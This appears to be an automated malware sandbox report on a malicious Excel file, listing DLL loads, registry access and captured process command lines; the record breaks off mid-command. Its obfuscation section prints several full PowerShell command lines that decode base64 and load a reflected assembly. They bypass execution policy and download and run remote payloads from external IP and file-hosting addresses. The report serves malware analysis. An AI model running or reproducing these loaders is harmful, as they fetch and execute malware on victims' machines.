              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: .pdb| source: powershell.exe, 00000008.00000002.512809894.000000001C109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdb source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdbhP source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
              Source: PI-02911202409#.xla.xlsxInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              barindex
              PowerShell case anomaly found
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Suspicious command line found
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg